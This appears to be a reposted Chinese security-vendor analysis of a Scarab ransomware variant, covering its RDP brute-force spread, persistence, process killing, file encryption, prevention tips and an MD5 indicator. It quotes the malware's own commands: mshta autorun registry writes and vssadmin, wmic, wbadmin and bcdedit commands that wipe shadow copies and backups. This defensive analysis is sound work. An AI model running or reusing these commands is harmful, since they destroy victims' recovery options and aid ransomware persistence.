40

威胁预警 | Scarab勒索病毒变种来袭

 5 years ago
source link: http://www.freebuf.com/vuls/174870.html?amp%3Butm_medium=referral
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

一、事件背景

最近接到应急响应客户被勒索病毒攻击,深信服EDR安全团队捕获到相应的恶意样本,经分析确认此样本为Scarab勒索病毒变种样本。

Scarab勒索病毒是利用Necurs僵尸网络进行传播,Necurs是世界上最大的僵尸网络之一,曾用于传播多个恶意家族样本,最新变种主要通过RDP爆破+人工植入的方式传播感染主机。

爆破的相关日志,如下:

RZzQ3m6.jpg!web

二、样本分析

(1)样本通过GetKeyboardType获取当前用户键盘类型,如下:

7NZRfyM.jpg!web

(2)进行一连串的字符串解密操作,得到程序的一些加密配置信息等,如下:

VvU3Uve.jpg!web

(3)打开注册表项HKEY_CURRENT_USER\Software\ILRTISo,如下:

67bAZb3.jpg!web

查询idle注册表项,是否设置,如下:

VFnmQ3U.jpg!web

(4)拷贝自身到%APPDATA%\Roaming目录下,并重命名为sevnz.exe,如下:

emMFfif.jpg!web

通过CreateProcess调用cmd.exe命名执行:

/c copy /y [Virus文件名路径] %APPDATA%\sevnz.exe,如下:

M3qaii.jpg!web

病毒母体拷贝自身到%APPDATA%目录下sevnz.exe,如下:

Jvyaiu7.jpg!web

(5)查询%APPDATA%目录下是否存在sevnz.exe程序,如下:

YNFZbyI.jpg!web

然后自己传入参数“runas”,并调用ShellExecuteW生成一个新的进程,如下:

2E7rUfm.jpg!web

(6)执行%APPDATA%目录下的sevnz.exe程序,如下:

Uje2IzM.jpg!web

(7)sevnz.exe通过CreateProcess调用cmd.exe命名执行:

mshta.exe javascript:o=newActiveXObject(‘Scripting.FileSystemObject’);setInterval(function(){try{o.DeleteFile(‘[FileName.exe]’);close()}catch(e){}},10);

删除母体文件,动态调试,如下:

QNbEraz.jpg!web

(8)母体样本通过删除sevnz.exe,来判断之前的sevnz.exe是否启动,如下:

MfAZzub.jpg!web

如果程序已启动,删除会失败,如下:

YNj6fyN.jpg!web

(9)当sevnz.exe在运行之中时,调用JavaScript脚本,将此进程添加到注册表的auto-run,相应的脚本命令:

mshta.exe“javascript:o=new ActiveXObject(‘WScript.Shell’);
x=newActiveXObject(‘Scripting.FileSystemObject’);
setInterval(function(){try{i=x.GetFile(‘sevnz.exe’).Path;
o.RegWrite(‘HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\ILRTISo’,i);}
catch(e){}},10);

动态调试跟踪,如下:

zYzy6vZ.jpg!web

自启动项创建完成之后,如下:

7RZJfuR.jpg!web

(10)创建加密线程,执行勒索病毒的主要加密流程,如下:

J3U3Uzb.jpg!web

(11)通过JavaScript脚本读取注册表项HKEY_CURRENT_USER\Software\JBGUJ中的键值,然后执行里面的命令,如下:

YVzUnqe.jpg!web

注册表项中相关的命令脚本如下:

o=new ActiveXObject("WScript.Shell");
o.Run("cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0",0);
o.Run("cmd.exe /c wmic SHADOWCOPY DELETE",0);
o.Run("cmd.exe /c vssadmin Delete Shadows /All /Quiet",0);
o.Run("cmd.exe /c bcdedit /set {default} recoveryenabled No",0);
o.Run("cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures",0);

通过上面的脚本命令,删除磁盘卷影文件,防止用户恢复文件

(12)启动线程,执行加密流程,如下:

ZBf26rR.jpg!web

(13)遍历主机进程列表,发现如下进程列表,则结束,相关的进程列表如下:

agntsvc.exe;isqlplussvc.exe;ncsvc.exe;msftesql.exe;sqlagent.exe;sqlbrowser.exe;sqlservr.exe;sqlserver.exe;sqlwriter.exe;oracle.exe;ocssd.exe;dbsnmp.exe;synctime.exe;mydesktopqos.exe;agntsvc.exeisqlplussvc.exe;xfssvccon.exe;mydesktopservice.exe;ocautoupds.exe;agntsvc.exeagntsvc.exe;agntsvc.exeencsvc.exe;firefoxconfig.exe;tbirdconfig.exe;ocomm.exe;mysqld.exe;mysqld-nt.exe;mysqld-opt.exe;dbeng50.exe;sqbcoreservice.exe;

动态调试,得到相关的进程列表如下:

qemEFb7.jpg!web

结束进程的代码如下:

qauMn2Y.jpg!web

(14)加密文件的主函数过程代码,如下:

VJJRBne.jpg!web

zUnm6vr.jpg!web

(15)删除HKEY_CURRENT_USER\Software\JBGUJ注册表项的内容,如下:

eqyUvi3.jpg!web

(16)加密流程执行完成之后,原文件变为了scarab后缀的文件,如下:

aaIvyae.jpg!web

同时弹出相关的勒索信息,如下:

6NJNFva.jpg!web

三、预防措施

同时深信服EDR安全团队提醒用户:

1.不要点击来源不明的邮件以及附件
2.及时给电脑打补丁,修复漏洞
3.不从垃圾网站或不明网站下载软件
4.安装专业的终端/服务器安全防护软件
5.此勒索病毒变种主要通过RDP爆破的方式,建议用户及时修改密码

四、相关IOC

MD5

9A02862AC95345359DFC3DCC93E3C10E

* 本文作者:千里目安全实验室,转载注明来自FreeBuf.COM


About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK